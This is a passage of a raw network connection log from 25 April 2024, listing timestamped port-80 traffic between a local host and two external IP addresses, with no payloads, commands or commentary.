Apr 25, 2024 09:04:01.799060106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799072027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799096107 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799122095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799159050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799170017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799192905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799192905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799207926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799288988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799304008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799310923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799314022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799360037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799362898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799426079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799427986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799463987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799513102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799520016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799571991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799606085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799684048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799689054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799700022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799732924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799737930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799787998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799807072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799840927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799885988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.799916029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799951077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.799985886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800021887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800069094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800148964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800159931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800213099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800213099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800230980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800256014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800292969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800323009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800347090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800422907 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800426006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800468922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800523043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800525904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800652981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800709009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800766945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800795078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800838947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800858021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800915956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800960064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.800973892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.800986052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801023006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801105976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801117897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801131010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801143885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801152945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801155090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801182985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801217079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801228046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801259995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801269054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801306009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801317930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801361084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801407099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801450014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801481962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801528931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801548958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801590919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801641941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801652908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801656961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801686049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801702976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801764965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801783085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801804066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801836967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801858902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.801887035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.801963091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802051067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802054882 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802062988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802073956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802110910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802123070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802194118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802196026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802208900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802231073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802256107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802280903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802293062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802335978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802341938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802352905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802436113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802436113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802452087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802464008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802484035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802527905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802541971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802582979 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802624941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802634001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802685022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802696943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802707911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802733898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802741051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802755117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802776098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802807093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802828074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802838087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802901030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802927017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.802947998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802961111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.802989960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.836810112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.836827993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.836874008 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.879484892 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.973778963 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 09:04:01.973910093 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 09:04:01.975179911 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 09:04:02.020076990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020091057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020113945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020144939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020165920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020180941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020193100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020204067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020248890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020248890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020251036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020279884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020286083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020315886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020349026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020381927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020387888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020425081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020488977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020494938 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020503044 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020529032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020539999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020540953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020577908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020601034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020679951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020690918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020701885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020749092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020760059 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020793915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020808935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020826101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020870924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020900965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020946026 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.020976067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.020987034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021024942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021027088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021037102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021090984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021109104 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021123886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021142960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021157980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021169901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021198034 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021219969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021265984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021265984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021277905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021317005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021353006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021363974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021394014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021401882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021456957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021471024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021490097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021507025 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021539927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021542072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021578074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021590948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021624088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021637917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021692991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021704912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021730900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021760941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021781921 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021816969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021830082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021856070 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021888971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021933079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.021938086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.021990061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022001982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022026062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022058964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022072077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022094011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022099018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022130013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022192001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022203922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022234917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022264957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022284985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022298098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022309065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022337914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022355080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022371054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022382975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022392988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022418022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022500992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022511959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022525072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022536993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022536993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022547960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022573948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022577047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022583961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022598982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022631884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022691965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022706032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022742033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022747993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022804976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022819996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022830963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022855997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022856951 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022878885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.022931099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022943020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.022985935 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023164034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023179054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023221016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023226023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023251057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023278952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023299932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023334980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023350000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023358107 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023361921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023390055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023422956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023473978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023485899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023523092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023525000 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023525000 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023561001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023602009 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023612976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023624897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023634911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023660898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023663998 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023689032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023730993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023750067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023771048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023786068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023797035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023814917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023848057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023861885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023885012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.023890018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023915052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023953915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.023993015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024019957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024036884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024048090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024079084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024079084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024116993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024128914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024153948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024173021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024300098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024334908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024341106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024410963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024451017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024455070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024467945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024491072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024528980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024548054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024559975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024595022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024600029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024625063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024648905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024661064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024693966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.024701118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024791002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.024802923 CEST	80	49733	176.97.76.106	192.168.2.4
